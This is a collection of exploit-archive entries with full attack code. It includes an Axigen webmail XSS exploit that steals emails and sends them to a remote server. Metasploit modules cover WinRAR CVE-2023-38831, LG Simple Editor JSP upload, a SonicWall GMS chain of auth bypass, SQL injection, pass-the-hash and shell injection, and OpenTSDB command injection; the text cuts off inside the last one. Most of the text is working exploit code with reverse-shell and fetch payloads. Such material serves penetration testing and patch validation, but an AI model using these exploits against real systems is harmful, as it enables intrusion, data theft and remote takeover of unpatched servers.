<pre><code># Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS<br /># Google Dork: inurl:passwordexpired=yes<br /># Date: 2023-08-21<br /># Exploit Author: AmirZargham<br /># Vendor Homepage: https://www.axigen.com/<br /># Software Link: https://www.axigen.com/mail-server/download/<br /># Version: (10.5.0–4370c946) and older version of Axigen WebMail<br /># Tested on: firefox,chrome<br /># CVE: CVE-2022-31470<br /><br />Exploit<br />We use the second Reflected XSS to exploit this vulnerability, create a<br />malicious link, and steal user emails.<br /><br />Dropper code<br />This dropper code, loads and executes JavaScript exploit code from a remote<br />server.<br /><br />');<br />x = document.createElement('script');<br />x.src = 'https://example.com/exploit.js';<br />window.addEventListener('DOMContentLoaded',function y(){<br /> document.body.appendChild(x)<br />})//<br /><br /><br /><br />Encoded form<br /><br />/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27<br />https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//<br /><br /><br />Exploit code<br /><br />xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new<br />XMLHttpRequest();<br />oob_server = 'https://example.com/';<br />var script_tag = document.createElement('script');<br /><br />xhr1.open('GET', '/', true);<br />xhr1.onreadystatechange = () => {<br /> if (xhr1.readyState === XMLHttpRequest.DONE) {<br /> _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];<br /> xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,<br />true);<br /> xhr2.setRequestHeader('Content-Type', 'application/json');<br /> xhr2.onreadystatechange = () => {<br /> if (xhr2.readyState === XMLHttpRequest.DONE) {<br /> if (xhr2.status === 401){<br /> script_tag.src =<br />`${oob_server}?status=session_expired&domain=${document.domain}`;<br /> document.body.appendChild(script_tag);<br /> } else {<br /> resp = xhr2.responseText;<br /> folderId = JSON.parse(resp)["mails"][0]["folderId"];<br /> xhr3.open('GET',<br />`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);<br /> xhr3.onreadystatechange = () => {<br /> if (xhr3.readyState === XMLHttpRequest.DONE) {<br /> emails = xhr3.responseText;<br /> script_tag.src =<br />`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;<br /> document.body.appendChild(script_tag);<br /> }<br /> };<br /> xhr3.send();<br /> }<br /> }<br /> };<br /> var body = JSON.stringify({isUnread: false});<br /> xhr2.send(body);<br /> }<br />};<br />xhr1.send();<br /><br /><br />Combining dropper and exploit<br />You can host the exploit code somewhere and then address it in the dropper<br />code.<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection<br /># Date: 28.08.2023<br /># Exploit Author: Miguel Santareno<br /># Vendor Homepage: https://elementor.com/<br /># Version: < 3.5.5<br /># Tested on: Google and Firefox latest version<br /># CVE : CVE-2022-4953<br /><br /># 1. Description<br />The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.<br /><br /><br /># 2. Proof of Concept (PoC)<br />Proof of Concept:<br />https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'zip'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /> include Msf::Exploit::EXE<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'WinRAR CVE-2023-38831 Exploit',<br /> 'Description' => %q{<br /> This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its<br /> embedded document, the decoy document is executed, leading to code execution.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => ['Alexander "xaitax" Hagenah'],<br /> 'References' => [<br /> ['CVE', '2023-38831'],<br /> ['URL', 'https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/'],<br /> ['URL', 'https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/']<br /> ],<br /> 'Platform' => ['win'],<br /> 'Arch' => [ ARCH_X64, ARCH_X86 ],<br /> 'Targets' => [['Windows', {}]],<br /> 'Payload' => {<br /> 'DisableNops' => true<br /> },<br /> 'DisclosureDate' => '2023-08-23',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('OUTPUT_FILE', [true, 'The output filename.', 'poc.rar']),<br /> OptPath.new('INPUT_FILE', [true, 'Path to the decoy file (PDF, JPG, PNG, etc.).'])<br /> ])<br /><br /> register_advanced_options([<br /> OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload executable.', nil])<br /> ])<br /> end<br /><br /> def exploit<br /> Dir.mktmpdir do |temp_dir|<br /> output_rar = File.join(Msf::Config.local_directory, datastore['OUTPUT_FILE'])<br /> input_file = datastore['INPUT_FILE']<br /> decoy_name = File.basename(input_file)<br /> decoy_ext = ".#{File.extname(input_file)[1..]}"<br /> payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8) + '.exe'<br /><br /> decoy_dir = File.join(temp_dir, "#{decoy_name}A")<br /> Dir.mkdir(decoy_dir)<br /><br /> payload_path = File.join(decoy_dir, payload_name)<br /> File.open(payload_path, 'wb') { |file| file.write(generate_payload_exe) }<br /><br /> bat_script = <<~BAT<br /> @echo off<br /> start "" "%~dp0#{payload_name}"<br /> start "" "%~dp0#{decoy_name}"<br /> BAT<br /><br /> bat_path = File.join(decoy_dir, "#{decoy_name}A.cmd")<br /> File.write(bat_path, bat_script)<br /><br /> FileUtils.cp(input_file, File.join(temp_dir, "#{decoy_name}B"))<br /><br /> zip_path = File.join(temp_dir, 'template.zip')<br /> Zip::File.open(zip_path, Zip::File::CREATE) do |zipfile|<br /> zipfile.add("#{decoy_name}B", File.join(temp_dir, "#{decoy_name}B"))<br /> zipfile.add("#{decoy_name}A/#{decoy_name}A.cmd", bat_path)<br /> zipfile.add("#{decoy_name}A/#{payload_name}", payload_path)<br /> end<br /><br /> content = File.binread(zip_path)<br /> content.gsub!(decoy_ext + 'A', decoy_ext + ' ')<br /> content.gsub!(decoy_ext + 'B', decoy_ext + ' ')<br /><br /> File.binwrite(output_rar, content)<br /><br /> print_good("Created #{output_rar}")<br /> end<br /> end<br /><br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper # includes register_files_for_cleanup<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'LG Simple Editor Remote Code Execution',<br /> 'Description' => %q{<br /> This Metasploit module exploits broken access control and directory traversal<br /> vulnerabilities in LG Simple Editor software for gaining code execution.<br /> The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.<br /> By exploiting this flaw, an attacker can upload and execute a malicious JSP<br /> payload with the SYSTEM user permissions.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'rgod', # Vulnerability discovery<br /> 'Ege Balcı <egebalci@pm.me>' # msf module<br /> ],<br /> 'References' => [<br /> ['ZDI', '23-1204'],<br /> ['CVE', '2023-40498']<br /> ],<br /> 'DefaultOptions' => {<br /> 'WfsDelay' => 5<br /> },<br /> 'Platform' => %w[win],<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> ['LG Simple Editor <= v3.21', {}]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-08-24',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> {<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do')<br /> }<br /> )<br /><br /> return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br /><br /> version = Rex::Version.new(res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', ''))<br /> return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'<br /> return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0')<br /><br /> Exploit::CheckCode::Safe<br /> end<br /><br /> def generate_jsp_payload<br /> exe = generate_payload_exe<br /> base64_exe = Rex::Text.encode_base64(exe)<br /> payload_name = rand_text_alpha(rand(3..8))<br /><br /> var_raw = 'a' + rand_text_alpha(rand(3..10))<br /> var_ostream = 'b' + rand_text_alpha(rand(3..10))<br /> var_buf = 'c' + rand_text_alpha(rand(3..10))<br /> var_decoder = 'd' + rand_text_alpha(rand(3..10))<br /> var_tmp = 'e' + rand_text_alpha(rand(3..10))<br /> var_path = 'f' + rand_text_alpha(rand(3..10))<br /> var_proc2 = 'e' + rand_text_alpha(rand(3..10))<br /><br /> jsp = %|<br /> <%@page import="java.io.*" %><br /> <%@page import="sun.misc.BASE64Decoder"%><br /> <%<br /> try {<br /> String #{var_buf} = "#{base64_exe}";<br /> BASE64Decoder #{var_decoder} = new BASE64Decoder();<br /> byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());<br /><br /> File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");<br /> String #{var_path} = #{var_tmp}.getAbsolutePath();<br /><br /> BufferedOutputStream #{var_ostream} =<br /> new BufferedOutputStream(new FileOutputStream(#{var_path}));<br /> #{var_ostream}.write(#{var_raw});<br /> #{var_ostream}.close();<br /> Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});<br /> } catch (Exception e) {<br /> }<br /> %><br /> |<br /><br /> jsp.gsub!(/[\n\t\r]/, '')<br /><br /> jsp<br /> end<br /><br /> def copy_file(src, dst)<br /> data = {<br /> command: 'cp',<br /> option: '-f',<br /> srcPath: src,<br /> destPath: dst<br /> }<br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'fileSystem',<br /> 'makeDetailContent.do'),<br /> 'headers' => {<br /> 'X-Requested-With' => 'XMLHttpRequest',<br /> 'Accept' => 'application/json'<br /> },<br /> 'ctype' => 'application/json',<br /> 'data' => data.to_json<br /> }<br /> )<br /> if res && res.code == 200 && res.body.to_s.include?('errorMessage":"success",')<br /> print_good "#{src} -> #{dst} copy successfull."<br /> else<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Could not copy the payload.")<br /> end<br /> end<br /><br /> def exploit<br /> rand_name = Rex::Text.rand_text_alpha(5)<br /> form = Rex::MIME::Message.new<br /> form.add_part(<br /> generate_jsp_payload,<br /> 'image/bmp',<br /> 'binary',<br /> "form-data; name=\"uploadFile\"; filename=\"#{rand_name}.bmp\""<br /> )<br /> form.add_part('/', nil, nil, 'form-data; name="uploadPath"')<br /> form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_x"')<br /> form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_y"')<br /> form.add_part('1920', nil, nil, 'form-data; name="uploadFile_width"')<br /> form.add_part('1080', nil, nil, 'form-data; name="uploadFile_height"')<br /><br /> print_status 'Uploading JSP payload...'<br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadImage.do'),<br /> 'ctype' => "multipart/form-data; boundary=#{form.bound}",<br /> 'data' => form.to_s<br /> }<br /> )<br /> if res && res.code == 200<br /> print_good 'Payload uploaded successfully'<br /> else<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Payload upload failed")<br /> end<br /><br /> # Now we copy our payload as JSP<br /> copy_file("/#{rand_name}_original.bmp", "/#{rand_name}.jsp")<br /> register_files_for_cleanup("./webapps/simpleeditor/#{rand_name}.jsp")<br /><br /> print_status 'Triggering payload...'<br /> send_request_cgi(<br /> {<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'simpleeditor', "#{rand_name}.jsp")<br /> }<br /> )<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html<br /><br /> # We can actually use the title to identify which platform we're on<br /> TITLE_WINDOWS = 'SonicWall Universal Management Host'<br /> TITLE_LINUX = 'SonicWall Universal Management Appliance'<br /><br /> # Secret key (from com.sonicwall.ws.servlet.auth.MSWAuthenticator)<br /> SECRET_KEY = '?~!@#$%^^()'<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Sonicwall',<br /> 'Description' => %q{<br /> This module exploits a series of vulnerabilities - including auth<br /> bypass, SQL injection, and shell injection - to obtain remote code<br /> execution on SonicWall GMS versions <= 9.9.9320.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'fulmetalpackets <fulmetalpackets@gmail.com>', # MSF module, analysis<br /> 'Ron Bowes <rbowes@rapid7.com>' # MSF module, original PoC, analysis<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://www.rapid7.com/blog/post/2023/07/13/etr-sonicwall-recommends-urgent-patching-for-gms-and-analytics-cves/'],<br /> [ 'CVE', '2023-34124'],<br /> [ 'CVE', '2023-34133'],<br /> [ 'CVE', '2023-34132'],<br /> [ 'CVE', '2023-34127']<br /> ],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => ['linux'],<br /> 'Arch' => [ARCH_X64],<br /> 'Type' => :dropper,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',<br /> 'WritableDir' => '/tmp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Platform' => ['win'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Type' => :cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp',<br /> 'WritableDir' => '%TEMP%'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Command',<br /> {<br /> 'Platform' => ['linux', 'unix'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Type' => :cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/generic'<br /> }<br /> }<br /> ],<br /> ],<br /> 'DefaultTarget' => 0,<br /><br /> 'DisclosureDate' => '2023-07-12',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> },<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => '443'<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [ true, 'The root URI of the Sonicwall appliance', '/']),<br /> ]<br /> )<br /><br /> register_advanced_options([<br /> # This varies by target, so don't define the default here<br /> OptString.new('WritableDir', [true, 'A directory where we can write files']),<br /> ])<br /> end<br /><br /> def check<br /> vprint_status("Validating SonicWall GMS is running on URI: #{target_uri.path}")<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'method' => 'GET'<br /> )<br /><br /> # Basic sanity checks - the path should return a HTTP/200<br /> return CheckCode::Unknown('Could not connect to web service - no response') if res.nil?<br /> return CheckCode::Unknown("Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200<br /><br /> # Ensure we're hitting plausible software<br /> return CheckCode::Detected("Running: #{::Regexp.last_match(1)}") if res.body =~ /(SonicWall Universal Management Suite [^<]+)</<br /><br /> # Otherwise, probably safe?<br /> CheckCode::Safe('Does not appear to be running SonicWall GMS')<br /> end<br /><br /> # Exploits CVE-2023-34133 (SQL injection) + CVE-2023-34124 (auth bypass) to<br /> # get a password hash<br /> def get_password_hash<br /> # attempt a sqli.<br /> vprint_status('Attempting to use SQL injection to grab the password hash for the superadmin user...')<br /><br /> # SQL injection question to fetch the admin password<br /> query = "' union select " +<br /><br /> # This must be a valid DOMAIN, which we can thankfully fetch from the DB<br /> '(select ID from SGMSDB.DOMAINS limit 1), ' +<br /><br /> # These fields don't matter<br /> "'', '', '', '', '', " +<br /><br /> # This field is returned, so use it to get the id and password for our<br /> # the super user, if possible<br /> "(select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0)," +<br /><br /> # The rest of the fields don't matter, end with a single quote to finish with a clean query<br /> "'', '', '"<br /> vprint_status("Generated SQL injection: #{query}")<br /><br /> # We need to sign our query with the SECRET_KEY<br /> token = Base64.strict_encode64(OpenSSL::HMAC.digest(OpenSSL::Digest.const_get('SHA1').new, SECRET_KEY, query))<br /> vprint_status("Generated a token using built-in secret key: #{token}")<br /><br /> # Build the URI<br /> # Note that encoding space to '+' doesn't work, so we replace it with '%20'<br /> uri = normalize_uri(target_uri.path, 'ws/msw/tenant', CGI.escape(query).gsub(/\+/, '%20'))<br /><br /> # Do it!<br /> print_status('Sending SQL injection request to get the username/hash...')<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => uri,<br /> 'headers' => {<br /> 'Auth' => '{"user": "system", "hash": "' + token + '"}'<br /> }<br /> )<br /><br /> # Sanity checks<br /> fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?<br /> fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code: #{res.code}") if res.code != 200<br /> fail_with(Failure::UnexpectedReply, "Service didn't return a JSON response") if res.get_json_document.empty?<br /><br /> # This field has the SQL injection response<br /> hash = res.get_json_document['alias']<br /><br /> # If the server responds with an error, it has no 'alias' field so the key<br /> # is missing entirely (this is where it fails against patched targets)<br /> fail_with(Failure::NotVulnerable, "SQL injection failed - service probably isn't vulnerable (or isn't configured)") if hash.nil?<br /><br /> # If alias is present but contains nothing, that means our query got no<br /> # results (probably there are no active users, or something?)<br /> fail_with(Failure::UnexpectedReply, 'SQL injection appeared to work, but no users returned - server might not have an admin account?') if hash.empty?<br /><br /> # If there's no ':' in the response, something super weird happened<br /> fail_with(Failure::UnexpectedReply, 'SQL injection returned the wrong value: no username or hash') if !hash.include?(':')<br /><br /> username, hash = hash.split(/:/, 2)<br /> print_good("Found an account: #{username}:#{hash}")<br /><br /> [username, hash]<br /> end<br /><br /> # Exploits CVE-2023-34132 (pass the hash)<br /> def authenticate(username, hash)<br /> # Grab server hashing token<br /> vprint_status('Grabbing server hashing token...')<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/appliance/login'),<br /> 'keep_cookies' => true<br /> )<br /> fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?<br /><br /> # Look for the getPwdHash function call, as it contains the token we need<br /> if res.body.match(/getPwdHash.*,'([0-9]+)'/).nil?<br /> fail_with(Failure::UnexpectedReply, 'Could not get the server token for authentication')<br /> end<br /><br /> server_token = ::Regexp.last_match(1)<br /> vprint_status("Got the server-side token: #{server_token}")<br /><br /> # Generate the client_hash by combining the server token + the stolen<br /> # password hash<br /> client_hash = Digest::MD5.hexdigest(server_token + hash)<br /> vprint_status("Generated client token: #{client_hash}")<br /><br /> # Send the token<br /> print_status('Attempting to authenticate with the client token + password hash...')<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'action' => 'login',<br /> 'clientHash' => client_hash,<br /> 'applianceUser' => username<br /> }<br /> })<br /><br /> fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?<br /><br /> # Check the title to make sure it worked<br /> html = res.get_html_document<br /> title = html.at('title').text<br /><br /> # We can identify the platform based on the title<br /> if title == TITLE_LINUX<br /> print_good("Successfully logged in as #{username} (Linux detected!)")<br /> return Msf::Module::Platform::Linux<br /> elsif title == TITLE_WINDOWS<br /> print_good("Successfully logged in as #{username} (Windows detected!)")<br /> return Msf::Module::Platform::Windows<br /> end<br /><br /> fail_with(Failure::UnexpectedReply, "Authentication appears to have failed! Title was \"#{title}\", which is not recognized as successful")<br /> end<br /><br /> def execute_command_windows(cmd)<br /> vprint_status("Encoding (Windows) command: #{cmd}")<br /><br /> # While this is a shell command injection issue, an aggressive XSS filter<br /> # prevents us from using a lot of important characters such as quotes and<br /> # plus and ampersands and stuff. We can't even use Base64, because we can't<br /> # use the + sign!<br /> #<br /> # We discovered that we could encode the command as integers, then use<br /> # powershell to decode + execute it, so that's what this does.<br /> cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}"<br /> encoded_cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{cmd.bytes.join(',')})))"<br /><br /> # Run the command<br /> vprint_status("Running shell command: #{cmd}")<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'action' => 'file_system',<br /> 'task' => 'search',<br /> 'searchFolder' => 'C:\\GMSVP\\etc\\',<br /> 'searchFilter' => "|#{encoded_cmd}| rem "<br /> }<br /> })<br /><br /> # This doesn't work, because our payload blocks and it eventually fails<br /> fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?<br /> fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')<br /><br /> print_good('Payload sent!')<br /> end<br /><br /> def execute_command_linux(cmd)<br /> vprint_status('Encoding (Linux) payload')<br /><br /> # Generate a filename<br /> payload_file = File.join(datastore['WritableDir'], ".#{Rex::Text.rand_text_alpha_lower(8)}")<br /><br /> # Wrap the command so we can execute arbitrary commands. There are several<br /> # difficulties here, the first of which is that we don't have much in the<br /> # way of tools. We're missing curl, wget, base64, python, ruby, even perl!<br /> # The best tool I could find for staging a payload is uudecode, so we use<br /> # that. (I noticed later that telnet exists, which could be another option)<br /> #<br /> # The good news is, with uudecode, we can send a base64 payload. The bad<br /> # news is, we can't use '+', which means we can't use pure base64! To work<br /> # around that, we replace '+' with '@', then use a bit of Bash magic to<br /> # put it back! We also can't use quotes, so we have to do a mountain of<br /> # escaping instead. The default shell is also /bin/sh, so we need to run<br /> # bash explicitly for the `$()` substitutions to work.<br /> cmd = [<br /> # Build a command that runs in bash (but don't use quotes!)<br /> 'bash -c ',<br /><br /> # Escape all this for bash<br /> Shellwords.escape([<br /> # Use `uudecode` to get a '+' into a variable<br /> "PLUS=$(echo -e begin-base64\ 755\ a\\\\nKwee\\\\n==== | uudecode -o-);",<br /><br /> # Build a new uuencode file (encoded in base64) with the payload<br /> "echo -e begin-base64 755 #{Shellwords.escape(payload_file)}\\\\n",<br /><br /> # Encode the payload as base64, but replace + with a variable<br /> "#{Base64.strict_encode64(cmd).gsub(/\+/, '${PLUS}')}\\\\n",<br /><br /> # Pipe into uudecode<br /> '==== | uudecode;',<br /><br /> # Run in the background with coproc<br /> "coproc #{Shellwords.escape(payload_file)};",<br /><br /> # Delete the payload file<br /> "rm #{payload_file}"<br /> ].join)<br /> ].join<br /><br /> # Run it!<br /> vprint_status("Encoded shell command: #{cmd}")<br /> print_status('Attempting to execute the shell injection payload')<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'action' => 'file_system',<br /> 'task' => 'search',<br /> 'searchFolder' => '/opt/GMSVP/etc/',<br /> 'searchFilter' => ";#{cmd}#"<br /> }<br /> })<br /><br /> # This doesn't work, because our payload blocks and it eventually fails<br /> fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?<br /> fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')<br /><br /> print_good('Payload sent!')<br /> end<br /><br /> def exploit<br /> # Get the password hash (from SQL injection + auth bypass)<br /> username, hash = get_password_hash<br /><br /> # Use pass-the-hash to log in using that hash<br /> detected_platform = authenticate(username, hash)<br /><br /> # Sanity-check the target<br /> if !datastore['ForceExploit'] && !target.platform.platforms.include?(detected_platform)<br /> fail_with(Failure::BadConfig, "The host appears to be #{detected_platform}, which the target #{target.name} does not support; please choose the appropriate target (or set ForceExploit to true)")<br /> end<br /><br /> # Generate a payload based on the target type<br /> case target['Type']<br /> when :cmd<br /> my_payload = payload.encoded<br /> when :dropper<br /> my_payload = generate_payload_exe<br /> else<br /> fail_with(Failure::BadConfig, "Unknown target type: #{target.type}")<br /> end<br /><br /> # Run a command, using the platform specified in the target<br /> if target.platform.platforms.include?(Msf::Module::Platform::Linux)<br /> execute_command_linux(my_payload)<br /> elsif target.platform.platforms.include?(Msf::Module::Platform::Windows)<br /> execute_command_windows(my_payload)<br /> else<br /> fail_with(Failure::Unknown, "Unknown platform: #{platform}")<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'OpenTSDB 2.4.1 unauthenticated command injection',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection<br /> vulnerability in the key parameter in OpenTSDB through<br /> 2.4.1 (CVE-2023-36812/CVE-2023-25826) in order to achieve<br /> unauthenticated remote code execution as the root user.<br /><br /> The module first attempts to obtain the OpenTSDB version via<br /> the api. If the version is 2.4.1 or lower, the module<br /> performs additional checks to obtain the configured metrics<br /> and aggregators. It then randomly selects one metric and one<br /> aggregator and uses those to instruct the target server to<br /> plot a graph. As part of this request, the key parameter is<br /> set to the payload, which will then be executed by the target<br /> if the latter is vulnerable.<br /><br /> This module has been successfully tested against OpenTSDB<br /> version 2.4.1.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Gal Goldstein', # discovery<br /> 'Daniel Abeles', # discovery<br /> 'Erik Wynter' # @wyntererik - Metasploit<br /> ],<br /> 'References' => [<br /> ['URL', 'https://github.com/OpenTSDB/opentsdb/security/advisories/GHSA-76f7-9v52-v2fw'], # security advisory<br /> ['CVE', '2023-36812'], # CVE linked in the official security advisory<br /> ['CVE', '2023-25826'] # CVE that seems to be a dupe of CVE-2023-36812 since it describes the same issue and references the PR that introduces the commits that are referenced in CVE-2023-36812<br /> ],<br /> 'Platform' => 'linux',<br /> 'Arch' => 'ARCH_CMD',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',<br /> 'RPORT' => 4242,<br /> 'SRVPORT' => 8080,<br /> 'FETCH_COMMAND' => 'CURL',<br /> 'FETCH_FILENAME' => Rex::Text.rand_text_alpha(2..4),<br /> 'FETCH_WRITABLE_DIR' => '/tmp',<br /> 'FETCH_SRVPORT' => 8081<br /> },<br /> 'Targets' => [ [ 'Linux', {} ] ],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2023-07-01',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options [<br /> OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']),<br /> ]<br /> end<br /><br /> def check<br /> # sanity check to see if the target is likely OpenTSDB<br /> res1 = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path)<br /> })<br /><br /> unless res1<br /> return CheckCode::Unknown('Connection failed.')<br /> end<br /><br /> unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenTSDB')<br /> return CheckCode::Safe('Target is not an OpenTSDB application.')<br /> end<br /><br /> # get the version via the api<br /> res2 = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'version')<br /> 